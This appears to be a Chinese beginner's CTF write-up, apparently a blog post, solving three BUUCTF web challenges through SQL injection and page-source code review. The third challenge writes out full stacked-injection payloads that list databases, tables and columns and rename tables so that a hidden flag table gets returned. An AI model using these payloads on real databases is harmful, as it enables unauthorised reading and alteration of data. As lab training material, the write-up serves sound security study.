【CTF入门】BUUCTF Web刷题
[极客大挑战 2019]EasySQL
打开网站,我们看到这个页面:
又是SQL注入,做吐了,按思路来能输入的地方都是注入点,我们尝试注入:
获得flag
考点:SQL注入
[极客大挑战 2019]Havefun
打开网站,我们看到这个页面:
我们看不出什么信息,首先观察一下网站的源码,我们在底部发现了注释的语句:
$cat=$_GET['cat']
echo $cat;
if($cat=='dog'){
echo 'Syc{cat_cat_cat}'
}
很简单的代码审计,我们GET请求名为“cat”的参数,当“cat”的值为“dog”时将会返回'Syc{cat_cat_cat}'字符串内容
得到flag:
考点:查看源码信息收集、代码审计
[强网杯 2019]随便注
打开网站,我们看到这个页面:
SQL注入,按照一般注入流程进行:
确定是字符型注入,我们尝试联合查询,大部分命令被过滤了:
因此我们使用堆叠注入:
1' ;show databases; #
我们发现supersqli是网站搭载的数据库
1' ;show tables from supersqli; #
1';show columns from `1919810931114514` #
我们可以推测,正常的查询请求是在查询表“words”的内容
之后想要查询flag数据需要使用被过滤的命令,因此在这里使用以下思路:
在存有flag的“1919810931114514”表中添加一个id列内容为NULL
将"words"表改成其他名字
将存有flag的“1919810931114514”表改名为"words"
1';
alter table `1919810931114514` add(id int NULL);
rename table `words` to `xuejian`;
rename table `1919810931114514` to `words`;#
这里完了之后我们的flag表里面的值是显示不出来的因为id 是NULL所以用or 1=1语句前面的语句返回为假 后面的返回为真也是真
考点:SQL堆叠注入、SQL表格偷梁换柱
标签:Web,BUUCTF,flag,cat,CTF,words,SQL,1919810931114514,注入 From: https://www.cnblogs.com/handsomexuejian/p/18315104